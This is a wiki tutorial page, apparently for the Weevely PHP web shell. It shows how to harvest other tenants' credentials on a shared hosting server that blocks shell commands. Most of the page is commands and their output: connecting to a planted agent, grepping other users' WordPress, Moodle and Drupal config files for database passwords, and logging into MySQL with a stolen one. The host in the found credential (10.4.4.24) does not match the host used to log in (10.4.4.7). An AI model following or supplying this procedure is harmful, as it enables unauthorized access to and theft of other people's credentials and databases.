Harvest other users credentials
epinna edited this page Sep 20, 2014
·
1 revision
This tutorial shows how to harvest other users credentials in a shared hosting server which does not allow shell commands execution.
-
Example PHP configuration:
disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system -
Used modules:
file_grep(grep)
Find a nice folder containing the other users web folders.
$ ./weevely.py http://target/agent.php mypassword
[+] weevely 3.0
[+] Target: target
[+] Session: _weevely/sessions/target/agent_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> ls
.
..
members
www-data@target:/var/www PHP> cd members
www-data@target:/var/www/members PHP> ls
.
..
alefst
anssot
latrwo
leempt
martol
natsta
rogjas
rotozy
tstanc
virots
yynost
www-data@target:/var/www/members PHP>Now run the grep command (an alias for the file_grep module) with a raw regexp to find some hard-coded password stored in other users PHP scripts. The used regular expression skips all the lines with previous comments (^[^*/#]) and that contains the word pass eventually trailed with word.
www-data@target:/var/www/members PHP> grep . '^[^*/#]*passw?o?r?d?'
./virots/config.php:$CFG->dbpass = 'FFFklasdhas()asdjj'; // your database password
./anssot/moodle/config.php:$CFG->dbpass = 'kasdhBSAUIGS77&'; // your database password
./leempt/wp/wp-config.php:define('DB_PASSWORD', 'AShasjdh177!@');
./alefst/wordpress/wp-config.php:define('DB_PASSWORD', 'ajhfaifh123!');
./martol/wordpress/wp-config.php:define('DB_PASSWORD', 'monkeydust1234');
./yynost/sites/default/settings.php: 'password' => 'XXyyynotsgoghia(XX',
./martol/drupal-7.x/sites/default/settings.php: 'password' => 'jhj@&&hgdas98k',
./natsta/drupal/sites/default/settings.php: 'password' => '99copacabana',
www-data@target:/var/www/members PHP> We found 8 credentials with just one shot. We can try also grepping some statements to connect to mysql.
www-data@target:/var/www/members PHP> grep . 'mysql_conn'
./rotozy/joosep-lineon/db.php:$g_link = mysql_connect( '10.4.4.24', 'rotozy', 'rotozy123') or die();
www-data@target:/var/www/members PHP>Let's test the latest one with sql_console module.
www-data@target:/var/www/members PHP> :sql_console -user rotozy -passwd rotozy123 -host 10.4.4.7
rotozy@server7 SQL> SELECT USER();
+----------------+
| rotozy@server7 |
+----------------+
rotozy@server7 SQL> Gotcha.